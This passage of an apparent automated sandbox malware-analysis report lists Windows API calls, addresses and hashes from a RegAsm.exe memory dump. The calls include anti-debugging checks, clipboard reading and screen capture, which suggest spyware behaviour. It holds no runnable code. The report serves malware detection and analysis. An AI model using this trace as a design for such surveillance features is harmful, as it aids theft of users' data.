                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                                • String ID:
                                                                • API String ID: 2829624132-0
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                • String ID:
                                                                • API String ID: 3906539128-0
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                                                • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                                                • ExitProcess.KERNEL32 ref: 0044338F
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Process$CurrentExitTerminate
                                                                • String ID:
                                                                • API String ID: 1703294689-0
                                                                APIs
                                                                • OpenClipboard.USER32(00000000), ref: 0040B74C
                                                                • GetClipboardData.USER32(0000000D), ref: 0040B758
                                                                • CloseClipboard.USER32 ref: 0040B760
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Clipboard$CloseDataOpen
                                                                • String ID:
                                                                • API String ID: 2058664381-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .
                                                                • API String ID: 0-248832578
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID: JD
                                                                • API String ID: 1084509184-2669065882
                                                                APIs
                                                                • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID: GetLocaleInfoEx
                                                                • API String ID: 2299586839-2904428671
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$FreeProcess
                                                                • String ID:
                                                                • API String ID: 3859560861-0
                                                                APIs
                                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionRaise
                                                                • String ID:
                                                                • API String ID: 3997070919-0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 0
                                                                • API String ID: 0-4108050209
                                                                APIs
                                                                • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FeaturePresentProcessor
                                                                • String ID:
                                                                • API String ID: 2325560087-0
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004523E7
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$_free$InfoLocale_abort
                                                                • String ID:
                                                                • API String ID: 1663032902-0
                                                                • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                                                • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                                                • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$InfoLocale_abort_free
                                                                • String ID:
                                                                • API String ID: 2692324296-0
                                                                • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                                                • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                                                • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                                                APIs
                                                                  • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                                                • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                • String ID:
                                                                • API String ID: 1272433827-0
                                                                • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                                                • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                                                • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                                                APIs
                                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                • String ID:
                                                                • API String ID: 1084509184-0
                                                                • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                                                • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                                                • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                                                APIs
                                                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00415537,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.1.1 Pro), ref: 0040F920
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoLocale
                                                                • String ID:
                                                                • API String ID: 2299586839-0
                                                                • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                                                • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                                                APIs
                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExceptionFilterUnhandled
                                                                • String ID:
                                                                • API String ID: 3192549508-0
                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                • Instruction Fuzzy Hash:
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                                                • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                                                • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                                                • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                                                • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                                                • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                                                • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                                                • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                                                • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                • Instruction ID: 06b531cc06dcd57701b547059d2c567c45bbe225ee7d26ac7aed84b394be02a5
                                                                • Opcode Fuzzy Hash: 82c6eebf497a8783bea5e127f8a47c76021f3e74a05456d4a9fdc662aa60ff2a
                                                                • Instruction Fuzzy Hash: 2DF19D716142558FC348CF1DE8A187BB3E1FB89311B450A2EF582C3391DB79EA16CB56
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction ID: 2ce137016e68017aebaac4bbf916a57dff7c64f07ba89619fc9d118b501662d8
                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                • Instruction Fuzzy Hash: F9C1D5B22091930AEF3D4639853063FFAA05E957B171A635FE4F2CB2D4FE18C924D514
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction ID: bc2d6065b6eca92eb436045fb502f22698d18e4b36ed1375ff5d5b4a3f5914d0
                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                • Instruction Fuzzy Hash: 75C1D7722091930AEF2D4739853463FFAA15EA57B171A236FE4F2CB2D4FE28C924D514
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction ID: 708e8454946620f186a1700387687a053fc407bd339bf74556c1f47a113f5a1a
                                                                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                                                • Instruction Fuzzy Hash: 95C1C3B220D0930AEF3D4639853063FFAA15EA67B171A675ED4F2CB2D4FE18C924D614
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction ID: 79ee4f31eba35b7567f7a499d226924a3a6c1d38d98321864059dc3c63d33f3d
                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                • Instruction Fuzzy Hash: 76C1E6B220D0930AEF3D4639853463FBAA15EA57B171A236FD4F2CB2D4FE18C924C614
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                • Instruction ID: 096ff1c695f9ab27d4b2dbab46670c8098de74970727e2ec16deab2a6828ec1d
                                                                • Opcode Fuzzy Hash: 2e85d6dc501202f3c2e801dccf0940871ddf0a86c450432c97aa3465398b7722
                                                                • Instruction Fuzzy Hash: EAB1A37951429A8ACB05EF68C4913F63BA1EF6A301F0850B9EC9CCF757D2398506EB24
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                                                • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                                                • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                                                • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                                                • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                • Instruction ID: 6c705508b021f12d90b9f9697341ee8142861c1d23b7247138392dbd6e0aa073
                                                                • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                • Instruction Fuzzy Hash: 59517671603604A7EF3445AB85567BF63899B0E304F18395FE882C73C2C52DDE02875E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                • Instruction ID: 84bf5d8b6cf777f915eff3509e2c27b9c7ae744ab127a35c194aadb47efed811
                                                                • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                • Instruction Fuzzy Hash: E1517761E0660557DF38892A94D67BF23A59B4E308F18351FE483CB3C2C65EEE06835E
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                • Instruction ID: d4d389248adab082d17fbdeb677dfbf93ddf16fcbb8c162b69e64d6cf0e33668
                                                                • Opcode Fuzzy Hash: 5391bdb46e7b363b15ab8dfbfe7515acbec1a5683836347dd09947684361f79a
                                                                • Instruction Fuzzy Hash: 61615B72A083059BC308DF35E481A5FB7E4AFCC718F814E2EF595D6151EA74EA08CB86
                                                                Memory Dump Source
                                                                • Source File: 0000000B.00000002.2570978425.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_11_2_400000_RegAsm.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: 582e3a7babb983407823034c482dc4f24404013c153b7f4d28c3fef3b0c68a44
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: 43113B7720034183D60CAA6DC4B45BBD795EADE320FBD627FF0414B744CA2AD4459508
                                                                APIs
                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418ECB
                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00418ED8
                                                                  • Part of subcall function 00419360: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419390
                                                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F4E
                                                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                                                • DeleteDC.GDI32(00000000), ref: 00418F68
                                                                • DeleteObject.GDI32(00000000), ref: 00418F6B
